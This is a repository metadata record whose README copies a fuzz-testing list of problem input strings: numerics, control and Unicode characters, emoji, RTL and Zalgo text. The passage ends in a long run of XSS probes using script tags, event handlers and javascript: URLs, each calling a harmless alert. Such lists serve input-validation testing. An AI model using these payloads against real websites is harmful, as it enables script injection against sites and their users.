{"id":17975080,"url":"https://github.com/initstring/test","last_synced_at":"2025-04-03T23:43:53.625Z","repository":{"id":130807599,"uuid":"272860643","full_name":"initstring/test","owner":"initstring","description":null,"archived":false,"fork":false,"pushed_at":"2020-06-22T00:58:39.000Z","size":14,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-02-09T11:31:04.600Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/initstring.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-06-17T02:36:20.000Z","updated_at":"2020-06-22T00:58:41.000Z","dependencies_parsed_at":"2023-05-18T13:46:17.200Z","dependency_job_id":null,"html_url":"https://github.com/initstring/test","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/initstring%2Ftest","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/initstring%2Ftest/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/initstring%2Ftest/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/initstring%2Ftest/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/initstring","download_url":"https://codeload.github.com/initstring/test/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247097973,"owners_count":20883127,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-29T17:18:09.666Z","updated_at":"2025-04-03T23:43:53.609Z","avatar_url":"https://github.com/initstring.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# test\n#\tReserved Strings\n#\n#\tStrings which may be used elsewhere in code\n\nundefined\nundef\nnull\nNULL\n(null)\nnil\nNIL\ntrue\nfalse\nTrue\nFalse\nTRUE\nFALSE\nNone\nhasOwnProperty\n\\\n\\\\\n\n#\tNumeric Strings\n#\n#\tStrings which can be interpreted as numeric\n\n0\n1\n1.00\n$1.00\n1/2\n1E2\n1E02\n1E+02\n-1\n-1.00\n-$1.00\n-1/2\n-1E2\n-1E02\n-1E+02\n1/0\n0/0\n-2147483648/-1\n-9223372036854775808/-1\n-0\n-0.0\n+0\n+0.0\n0.00\n0..0\n.\n0.0.0\n0,00\n0,,0\n,\n0,0,0\n0.0/0\n1.0/0.0\n0.0/0.0\n1,0/0,0\n0,0/0,0\n--1\n-\n-.\n-,\n999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999\nNaN\nInfinity\n-Infinity\nINF\n1#INF\n-1#IND\n1#QNAN\n1#SNAN\n1#IND\n0x0\n0xffffffff\n0xffffffffffffffff\n0xabad1dea\n123456789012345678901234567890123456789\n1,000.00\n1 000.00\n1'000.00\n1,000,000.00\n1 000 000.00\n1'000'000.00\n1.000,00\n1 000,00\n1'000,00\n1.000.000,00\n1 000 000,00\n1'000'000,00\n01000\n08\n09\n2.2250738585072011e-308\n\n#\tSpecial Characters\n#\n# ASCII punctuation. All of these characters may need to be escaped in some\n# contexts. Divided into three groups based on (US-layout) keyboard position.\n\n,./;'[]\\-=\n\u003c\u003e?:\"{}|_+\n!@#$%^\u0026*()`~\n\n# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,\n# and U+007F (DEL)\n# Often forbidden to appear in various text-based file formats (e.g. XML),\n# or reused for internal delimiters on the theory that they should never\n# appear in input.\n# The next line may appear to be blank or mojibake in some viewers.\n\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f\n\n# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.\n# Commonly misinterpreted as additional graphic characters.\n# The next line may appear to be blank, mojibake, or dingbats in some viewers.\n€‚ƒ„†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ\n\n# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode\n# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),\n# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often\n# treated as whitespace in some contexts.\n# This file unfortunately cannot express strings containing\n# U+0000, U+000A, or U+000D (NUL, LF, CR).\n# The next line may appear to be blank or mojibake in some viewers.\n# The next line may be flagged for \"trailing whitespace\" in some viewers.\n\t\u000b\f …             ​\u2028\u2029   \n\n# Unicode additional control characters: all of the characters with\n# general category Cf (in Unicode 8.0.0).\n# The next line may appear to be blank or mojibake in some viewers.\n­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿\n\n# \"Byte order marks\", U+FEFF and U+FFFE, each on its own line.\n# The next two lines may appear to be blank or mojibake in some viewers.\n\n￾\n\n#\tUnicode Symbols\n#\n#\tStrings which contain common unicode symbols (e.g. smart quotes)\n\nΩ≈ç√∫˜µ≤≥÷\nåß∂ƒ©˙∆˚¬…æ\nœ∑´®†¥¨ˆøπ“‘\n¡™£¢∞§¶•ªº–≠\n¸˛Ç◊ı˜Â¯˘¿\nÅÍÎÏ˝ÓÔÒÚÆ☃\nŒ„´‰ˇÁ¨ˆØ∏”’\n`⁄€‹›fifl‡°·‚—±\n⅛⅜⅝⅞\nЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя\n٠١٢٣٤٥٦٧٨٩\n\n#\tUnicode Subscript/Superscript/Accents\n#\n#\tStrings which contain unicode subscripts/superscripts; can cause rendering issues\n\n⁰⁴⁵\n₀₁₂\n⁰⁴⁵₀₁₂\nด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็\n\n#\tQuotation Marks\n#\n#\tStrings which contain misplaced quotation marks; can cause encoding errors\n\n'\n\"\n''\n\"\"\n'\"'\n\"''''\"'\"\n\"'\"'\"''''\"\n\u003cfoo val=“bar” /\u003e\n\u003cfoo val=“bar” /\u003e\n\u003cfoo val=”bar“ /\u003e\n\u003cfoo val=`bar' /\u003e\n\n#\tTwo-Byte Characters\n#\n#\tStrings which contain two-byte characters: can cause rendering issues or character-length issues\n\n田中さんにあげて下さい\nパーティーへ行かないか\n和製漢語\n部落格\n사회과학원 어학연구소\n찦차를 타고 온 펲시맨과 쑛다리 똠방각하\n社會科學院語學研究所\n울란바토르\n𠜎𠜱𠝹𠱓𠱸𠲖𠳏\n\n#\tChanging length when lowercased\n#\n#\tCharacters which increase in length (2 to 3 bytes) when lowercased\n#\tCredit: https://twitter.com/jifa/status/625776454479970304\n\nȺ\nȾ\n\n#\tJapanese Emoticons\n#\n#\tStrings which consists of Japanese-style emoticons which are popular on the web\n\nヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ\n(。◕ ∀ ◕。)\n`ィ(´∀`∩\n__ロ(,_,*)\n・( ̄∀ ̄)・:*:\n゚・✿ヾ╲(。◕‿◕。)╱✿・゚\n,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’\n(╯°□°)╯︵ ┻━┻)\n(ノಥ益ಥ)ノ ┻━┻\n┬─┬ノ( º _ ºノ)\n( ͡° ͜ʖ ͡°)\n¯\\_(ツ)_/¯\n\n#\tEmoji\n#\n#\tStrings which contain Emoji; should be the same behavior as two-byte characters, but not always\n\n😍\n👩🏽\n👾 🙇 💁 🙅 🙆 🙋 🙎 🙍\n🐵 🙈 🙉 🙊\n❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙\n✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿\n🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧\n0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟\n\n# Regional Indicator Symbols\n#\n# Regional Indicator Symbols can be displayed differently across\n# fonts, and have a number of special behaviors\n\n🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸\n🇺🇸🇷🇺🇸🇦🇫🇦🇲\n🇺🇸🇷🇺🇸🇦\n\n#\tUnicode Numbers\n#\n#\tStrings which contain unicode numbers; if the code is localized, it should see the input as numeric\n\n123\n١٢٣\n\n#\tRight-To-Left Strings\n#\n#\tStrings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)\n\nثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.\nבְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ\nהָיְתָהtestالصفحات التّحول\n﷽\nﷺ\nمُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،\n\n#\tTrick Unicode\n#\n#\tStrings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)\n\n‪‪test‪\n‫test‫\n\u2029test\u2029\ntest⁠test‫\n⁦test⁧\n\n#\tZalgo Text\n#\n#\tStrings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)\n\nṰ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣\n̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰\n̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟\n̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕\nZ̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮\n\n#\tUnicode Upsidedown\n#\n#\tStrings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)\n\n˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥\n00˙Ɩ$-\n\n#\tUnicode font\n#\n#\tStrings which contain bold/italic/etc. versions of normal characters\n\nThe quick brown fox jumps over the lazy dog\n𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠\n𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌\n𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈\n𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰\n𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘\n𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐\n⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢\n\n#\tScript Injection\n#\n#\tStrings which attempt to invoke a benign script injection; shows vulnerability to XSS\n\n\u003cscript\u003ealert(123)\u003c/script\u003e\n\u0026lt;script\u0026gt;alert(\u0026#39;123\u0026#39;);\u0026lt;/script\u0026gt;\n\u003cimg src=x onerror=alert(123) /\u003e\n\u003csvg\u003e\u003cscript\u003e123\u003c1\u003ealert(123)\u003c/script\u003e\n\"\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n'\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003c/script\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003c / script \u003e\u003c script \u003ealert(123)\u003c / script \u003e\n onfocus=JaVaSCript:alert(123) autofocus\n\" onfocus=JaVaSCript:alert(123) autofocus\n' onfocus=JaVaSCript:alert(123) autofocus\n<script>alert(123)</script>\n\u003csc\u003cscript\u003eript\u003ealert(123)\u003c/sc\u003c/script\u003eript\u003e\n--\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\";alert(123);t=\"\n';alert(123);t='\nJavaSCript:alert(123)\n;alert(123);\nsrc=JaVaSCript:prompt(132)\n\"\u003e\u003cscript\u003ealert(123);\u003c/script x=\"\n'\u003e\u003cscript\u003ealert(123);\u003c/script x='\n\u003e\u003cscript\u003ealert(123);\u003c/script x=\n\" autofocus onkeyup=\"javascript:alert(123)\n' autofocus onkeyup='javascript:alert(123)\n\u003cscript\\x20type=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x3Etype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Dtype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x09type=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Ctype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x2Ftype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n\u003cscript\\x0Atype=\"text/javascript\"\u003ejavascript:alert(1);\u003c/script\u003e\n'`\"\u003e\u003c\\x3Cscript\u003ejavascript:alert(1)\u003c/script\u003e\n'`\"\u003e\u003c\\x00script\u003ejavascript:alert(1)\u003c/script\u003e\nABC\u003cdiv style=\"x\\x3Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:expression\\x5C(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:expression\\x00(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:exp\\x00ression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:exp\\x5Cression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x09expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xC2\\xA0expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Dexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Cexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x20expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x00expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\x0Bexpression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\"\u003eDEF\nABC\u003cdiv style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\"\u003eDEF\n\u003ca href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n\u003ca href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\"\u003etest\u003c/a\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Aonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x22onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Bonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x0Donerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x2Fonerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x09onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x 